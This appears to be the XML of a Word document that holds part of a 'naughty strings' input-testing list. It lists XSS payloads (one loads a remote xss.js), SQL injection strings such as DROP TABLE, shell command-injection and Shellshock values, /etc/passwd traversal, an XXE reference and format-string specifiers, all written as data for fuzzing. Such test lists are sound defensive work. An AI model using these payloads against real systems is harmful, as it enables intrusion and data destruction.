        <w:t xml:space="preserve">&lt;img src\x13=x onerror="javascript:alert(181)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x32=x onerror="javascript:alert(182)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x12=x onerror="javascript:alert(183)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x11=x onerror="javascript:alert(184)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x00=x onerror="javascript:alert(185)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x47=x onerror="javascript:alert(186)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x09onerror="javascript:alert(187)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x10onerror="javascript:alert(188)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x11onerror="javascript:alert(189)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x12onerror="javascript:alert(190)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x13onerror="javascript:alert(191)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img[a]b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x09"javascript:alert(193)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x10"javascript:alert(194)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x11"javascript:alert(195)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x12"javascript:alert(196)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x32"javascript:alert(197)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x00"javascript:alert(198)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(199)&gt;XXX&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src="x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;javascript:alert(200)&lt;/script&gt;"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r>
        <w:t xml:space="preserve">&lt;img src onerror /" '"= alt=javascript:alert(201)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p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&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG """&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC= onmouseover="alert(‘209’)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">perl -e ‘print "&lt;IMG SRC=java\0script:alert("218")&gt;";’ &gt; out</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;SCRIPT/SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;&lt;SCRIPT&gt;alert(“221”);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=“javascript:alert(‘222’)”</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">";alert(‘223’);//</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Copy me</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Scroll over me </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">http://a/%%30%30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1;DROP TABLE users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'; DROP TABLE users– 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' OR 1=1 – 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' OR ‘1’='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'; EXEC sp_MSForEachTable 'DROP TABLE ?'; –</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">_</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–help</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$USER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">/dev/null; touch /tmp/blns.fail ; echo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">touch /tmp/blns.fail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$(touch /tmp/blns.fail)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">@{[system “touch /tmp/blns.fail”]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">eval("puts ‘hello world’")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">System("ls -al /")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -al /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Kernel.exec("ls -al /")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Kernel.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%x('ls -al /')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">]&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&amp;xxe;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$HOME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$ENV{‘HOME’}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%s%s%s%s%s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{0}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%*.*s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%@</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">File:///</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">../../../../../../../../../../../etc/passwd%00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">../../../../../../../../../../../etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">() { 0; }; touch /tmp/blns.shellshock1.fail;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">() { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; } &gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[$($())] { touch /tmp/blns.shellshock2.fail; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;&lt;&lt; %s(un='%s') = %u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">+++ATH0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">CON</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">PRN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">AUX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">CLOCK$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">NUL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">A:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ZZ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">COM1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">LPT1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">LPT2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">LPT3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">COM2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">COM3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">COM4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">DCC SEND STARTKEYLOGGER 0 0 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Scunthorpe General Hospital</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Penistone Community Church</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Lightwater Country Park</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Jimmy Clitheroe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Horniman Museum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">shitake mushrooms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">RomansInSussex.co.uk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="DeterministicId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.cum.qc.ca/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Craig Cockburn, Software Specialist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Linda Callahan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Dr. Herman I. Libshitz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">magna cum laude</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Super Bowl XXX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">medieval erection of parapets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">evaluate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">mocha</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">expression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Arsenal canal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">classic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Tyson Gay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Dick Van Dyke</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">basement</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">Roses are 0;31mred0m, violets are 0;34mblue. Hope you enjoy terminal hue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">But now...20Cfor my greatest trick...8m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The quick brown fox… [Beeeep]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🏳0🌈️</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">జ్ఞ‌ా</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">گچپژ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{% print ‘x’ * 64 * 1024**3 %}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">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2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r>
        <w:t xml:space="preserve">En dash –</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Em dash —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Horizontal bar ―</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Figure dash ‒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Swung dash ⁓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Single opening quote ‘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Single closing quote ’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Double opening quote “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Double closing quote ”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Copyright ©</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Registered ®</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Trademark ™</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Section §</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Paragraph ¶</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ellipsis …</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Optional hyphen ¬</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Non-breaking hyphen ߛ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Em space ߓ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">En space ߒ</w:t>
      </w:r>
    </w:p>
    <w:p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&quot;/etc/passwd&quot;" TargetMode="External" Id="DeterministicId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cum.qc.ca/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ettings" Target="settings.xml" Id="DeterministicId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="DeterministicId6" /></Relationships>
</file>